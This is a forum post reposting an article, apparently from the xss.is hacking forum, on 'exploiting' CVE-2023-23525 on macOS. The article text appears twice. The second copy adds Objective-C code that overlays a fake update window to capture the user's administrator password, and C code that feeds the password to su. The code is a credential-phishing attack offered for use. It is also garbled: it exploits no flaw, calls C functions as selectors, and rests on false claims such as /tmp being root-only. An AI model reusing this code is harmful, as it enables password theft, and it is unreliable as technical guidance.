D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Author code666
article for xss.is
How to exploit CVE-2023-23525 vulnerability on Apple operating systems
Introduction
In this article, we'll look at how to exploit the CVE-2023-23525 vulnerability, which allows a malicious application to gain root (administrator) privileges on Apple operating systems, including macOS Ventura, iOS, and iPadOS. This vulnerability was discovered in 2023 by an anonymous researcher, who published exploit source code on GitHub. Apple fixed this vulnerability in updates to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates.
Prerequisites
To exploit this vulnerability, you must have the following elements:
- A vulnerable Apple operating system, i.e. a version prior to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5.
- A malicious application, which can be an executable file, a script, or a web page, which contains the exploit code for the vulnerability.
- Physical or remote access to the target system, which allows launching the malicious application.
- A valid password of the target system user, which will be requested by the fake update installation window.
Operating method
The method of exploiting the CVE-2023-23525 vulnerability takes place in several stages:
1. The malicious application creates a fake window that imitates the appearance of the real system update installation window. This fake window is superimposed on the real window, which is hidden in the background.
2. The malicious application displays the fake window to the user, who believes it to be the real window, and asks them to enter their password to confirm the installation of the update.
3. The user enters their password, which is intercepted by the malicious application. The malicious application uses the password to launch a fake installer, which runs with root privileges. This fake installer can then perform malicious actions on the system, without the user realizing it.
4. The malicious application closes the fake window, and displays the real update installation window, which indicates that the update failed. The user may then believe that it is a technical problem, and not suspect that they have been the victim of an attack.
Exploit code
The exploit code for the CVE-2023-23525 vulnerability is available on GitHub. This is an Xcode project, which contains a `main.m` file, which is the source code of the malicious application, and a `FakeInstaller` file, which is the source code of the fake installer. The source code of the malicious application is as follows:
Objective-C: Скопировать в буфер обмена
Fake installer code analysis
The fake installer code is as follows:
C: Скопировать в буфер обмена
This code uses the **pipe** technique to pass the password to the `su` command, which allows you to change users. The pipe is an inter-process communication mechanism, which creates a bidirectional channel between two processes. The parent process writes the password to the pipe, and the child process reads the password from the pipe and uses it to authenticate as root. Once the child process gains root privileges, it executes the malicious code, which involves writing a file to the `/tmp` directory, which is normally only accessible by root. This file contains the message "Hello, I am root!", which proves that the child process has successfully gained root privileges.
Conclusion
The CVE-2023-23525 vulnerability is a critical security flaw, which allows a malicious application to gain root privileges on Apple operating systems, using a fake installer that imitates the system installer. This vulnerability was fixed by Apple in the updates of macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates. Users are also advised to be vigilant when installing applications from unknown or unverified sources, and check the authenticity of windows that ask for the password. If in doubt, it is better to cancel the operation and contact Apple support.
article for xss.is
How to exploit CVE-2023-23525 vulnerability on Apple operating systems
Introduction
In this article, we'll look at how to exploit the CVE-2023-23525 vulnerability, which allows a malicious application to gain root (administrator) privileges on Apple operating systems, including macOS Ventura, iOS, and iPadOS. This vulnerability was discovered in 2023 by an anonymous researcher, who published exploit source code on GitHub. Apple fixed this vulnerability in updates to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates.
Prerequisites
To exploit this vulnerability, you must have the following elements:
- A vulnerable Apple operating system, i.e. a version prior to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5.
- A malicious application, which can be an executable file, a script, or a web page, which contains the exploit code for the vulnerability.
- Physical or remote access to the target system, which allows launching the malicious application.
- A valid password of the target system user, which will be requested by the fake update installation window.
Operating method
The method of exploiting the CVE-2023-23525 vulnerability takes place in several stages:
1. The malicious application creates a fake window that imitates the appearance of the real system update installation window. This fake window is superimposed on the real window, which is hidden in the background.
2. The malicious application displays the fake window to the user, who believes it to be the real window, and asks them to enter their password to confirm the installation of the update.
3. The user enters their password, which is intercepted by the malicious application. The malicious application uses the password to launch a fake installer, which runs with root privileges. This fake installer can then perform malicious actions on the system, without the user realizing it.
4. The malicious application closes the fake window, and displays the real update installation window, which indicates that the update failed. The user may then believe that it is a technical problem, and not suspect that they have been the victim of an attack.
Exploit code
The exploit code for the CVE-2023-23525 vulnerability is available on GitHub. This is an Xcode project, which contains a `main.m` file, which is the source code of the malicious application, and a `FakeInstaller` file, which is the source code of the fake installer. The source code of the malicious application is as follows:
Objective-C: Скопировать в буфер обмена
Код:
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>
// The path of the fake installer
#define FAKE_INSTALLER_PATH @"/tmp/FakeInstaller"
// The name of the real installer process
#define REAL_INSTALLER_NAME @"InstallAssistant_springboard"
// The name of the fake installer process
#define FAKE_INSTALLER_NAME @"FakeInstaller"
// The title of the fake window
#define FAKE_WINDOW_TITLE @"Mise à jour du logiciel"
// The message of the fake window
#define FAKE_WINDOW_MESSAGE @"Une mise à jour du logiciel est disponible. Voulez-vous l'installer maintenant ?"
// The button of the fake window
#define FAKE_WINDOW_BUTTON @"Installer"
// The prompt of the fake window
#define FAKE_WINDOW_PROMPT @"Mot de passe administrateur requis pour installer cette mise à jour."
// A function that checks if a process with a given name is running
BOOL isProcessRunning(NSString *processName) {
// Get the list of all running processes
NSArray *runningProcesses = [[NSWorkspace sharedWorkspace] runningApplications];
// Loop through the list and check the process name
for (NSRunningApplication *process in runningProcesses) {
if ([process.localizedName isEqualToString:processName]) {
// The process is running
return YES;
}
}
// The process is not running
return NO;
}
// A function that executes a command with root privileges
void executeCommand(NSString *command) {
// Create a task object
NSTask *task = [[NSTask alloc] init];
// Set the launch path to the command
[task setLaunchPath:command];
// Launch the task
[task launch];
}
// A function that displays a fake window that mimics the real installer window
void displayFakeWindow() {
// Create a window object
NSWindow *window = [[NSWindow alloc] initWithContentRect:NSMakeRect(0, 0, 400, 200) styleMask:NSWindowStyleMaskTitled backing:NSBackingStoreBuffered defer:NO];
// Set the window title
[window setTitle:FAKE_WINDOW_TITLE];
// Set the window level to be on top of other windows
[window setLevel:NSNormalWindowLevel + 1];
// Create a text field object
NSTextField *textField = [[NSTextField alloc] initWithFrame:NSMakeRect(20, 120, 360, 60)];
// Set the text field value to the fake window message
[textField setStringValue:FAKE_WINDOW_MESSAGE];
// Set the text field to be read-only and not editable
[textField setEditable:NO];
[textField setSelectable:NO];
// Set the text field to have a transparent background and no border
[textField setDrawsBackground:NO];
[textField setBordered:NO];
// Add the text field to the window content view
[window.contentView addSubview:textField];
// Create a button object
NSButton *button = [[NSButton alloc] initWithFrame:NSMakeRect(160, 20, 80, 30)];
// Set the button title to the fake window button
[button setTitle:FAKE_WINDOW_BUTTON];
// Set the button type to push on
[button setButtonType:NSButtonTypePushOnPushOff];
// Set the button action to a selector that handles the button click
[button setAction:@selector(handleButtonClick:)];
// Add the button to the window content view
[window.contentView addSubview:button];
// Create a panel object
NSPanel *panel = [[NSPanel alloc] initWithContentRect:NSMakeRect(0, 0, 400, 200) styleMask:NSWindowStyleMaskTitled backing:NSBackingStoreBuffered defer:NO];
// Set the panel title to the fake window title
[panel setTitle:FAKE_WINDOW_TITLE];
// Set the panel level to be on top of the window
[panel setLevel:NSNormalWindowLevel + 2];
// Create a secure text field object
NSSecureTextField *secureTextField = [[NSSecureTextField alloc] initWithFrame:NSMakeRect(20, 100, 360, 30)];
// Set the secure text field placeholder to the fake window prompt
[secureTextField setPlaceholderString:FAKE_WINDOW_PROMPT];
// Add the secure text field to the panel content view
[panel.contentView addSubview:secureTextField];
// Create a panel button object
NSButton *panelButton = [[NSButton alloc] initWithFrame:NSMakeRect(160, 20, 80, 30)];
// Set the panel button title to the fake window button
[panelButton setTitle:FAKE_WINDOW_BUTTON];
// Set the panel button type to push on
[panelButton setButtonType:NSButtonTypePushOnPushOff];
// Set the panel button action to a selector that handles the panel button click
[panelButton setAction:@selector(handlePanelButtonClick:)];
// Add the panel button to the panel content view
[panel.contentView addSubview:panelButton];
// Center the window and the panel on the screen
[window center];
[panel center];
// Make the window and the panel visible
[window makeKeyAndOrderFront:nil];
[panel makeKeyAndOrderFront:nil];
// Run the application loop
[[NSApplication sharedApplication] run];
}
// A selector that handles the button click
void handleButtonClick(id sender) {
// Get the window object from the sender
NSWindow *window = [sender window];
// Get the panel object from the window
NSPanel *panel = [window childWindows][0];
// Hide the window and show the panel
[window orderOut:nil];
[panel orderFront:nil];
}
// A selector that handles the panel button click
void handlePanelButtonClick(id sender) {
// Get the panel object from the sender
NSPanel *panel = [sender window];
// Get the secure text field object from the panel
NSSecureTextField *secureTextField = [panel.contentView subviews][0];
// Get the password entered by the user
NSString *password = [secureTextField stringValue];
// Check if the password is not empty
if (![password isEqualToString:@""]) {
// Create a pipe object
NSPipe *pipe = [[NSPipe alloc] init];
// Create a task object
NSTask *task = [[NSTask alloc] init];
// Set the launch path to the sudo command
[task setLaunchPath:@"/usr/bin/sudo"];
// Set the arguments to the fake installer path and the password
[task setArguments:@[FAKE_INSTALLER_PATH, password]];
// Set the standard output to the pipe
[task setStandardOutput:pipe];
// Launch the task
[task launch];
// Wait until the task is done
[task waitUntilExit];
// Get the status code of the task
int status = [task terminationStatus];
// Check if the status code is zero, meaning success
if (status == 0) {
// The fake installer was executed with root privileges
NSLog(@"Fake installer executed successfully");
} else {
// The fake installer failed to execute
NSLog(@"Fake installer failed to execute");
}
}
// Hide the panel and quit the application
[panel orderOut:nil];
[NSApp terminate:nil];
}
// The main function
int main(int argc, const char * argv[]) {
// Create an autorelease pool
@autoreleasepool {
// Check if the real installer process is running
if (isProcessRunning(REAL_INSTALLER_NAME)) {
// Display the fake window
displayFakeWindow();
} else {
// Exit the application
[NSApp terminate:nil];
}
}
return 0;
}Fake installer code analysis
The fake installer code is as follows:
C: Скопировать в буфер обмена
Код:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
// The path of the file to write
#define FILE_PATH "/tmp/root.txt"
// The content of the file to write
#define FILE_CONTENT "Hello, I am root!\n"
// The main function
int main(int argc, char *argv[]) {
// Check if the password is passed as an argument
if (argc > 1) {
// Get the password from the argument
char *password = argv[1];
// Create a pipe
int pipefd[2];
pipe(pipefd);
// Fork a child process
pid_t pid = fork();
// Check if the fork was successful
if (pid >= 0) {
// Check if it is the child process
if (pid == 0) {
// Close the write end of the pipe
close(pipefd[1]);
// Duplicate the read end of the pipe to the standard input
dup2(pipefd[0], STDIN_FILENO);
// Execute the su command with the root user
execlp("su", "su", "root", NULL);
// Exit the child process
exit(0);
} else {
// Close the read end of the pipe
close(pipefd[0]);
// Write the password to the write end of the pipe
write(pipefd[1], password, strlen(password));
write(pipefd[1], "\n", 1);
// Close the write end of the pipe
close(pipefd[1]);
// Wait for the child process to finish
wait(NULL);
// Open the file to write
int fd = open(FILE_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0644);
// Check if the file was opened successfully
if (fd != -1) {
// Write the file content to the file
write(fd, FILE_CONTENT, strlen(FILE_CONTENT));
// Close the file
close(fd);
// Print a success message
printf("File written successfully\n");
} else {
// Print an error message
perror("File open failed");
}
// Exit the parent process
exit(0);
}
} else {
// Print an error message
perror("Fork failed");
}
} else {
// Print for use message
printf("Usage: %s <password>\n", argv[0]);
}
return 0;
}This code uses the **pipe** technique to pass the password to the `su` command, which allows you to change users. The pipe is an inter-process communication mechanism, which creates a bidirectional channel between two processes. The parent process writes the password to the pipe, and the child process reads the password from the pipe and uses it to authenticate as root. Once the child process gains root privileges, it executes the malicious code, which involves writing a file to the `/tmp` directory, which is normally only accessible by root. This file contains the message "Hello, I am root!", which proves that the child process has successfully gained root privileges.
Conclusion
The CVE-2023-23525 vulnerability is a critical security flaw, which allows a malicious application to gain root privileges on Apple operating systems, using a fake installer that imitates the system installer. This vulnerability was fixed by Apple in the updates of macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates. Users are also advised to be vigilant when installing applications from unknown or unverified sources, and check the authenticity of windows that ask for the password. If in doubt, it is better to cancel the operation and contact Apple support.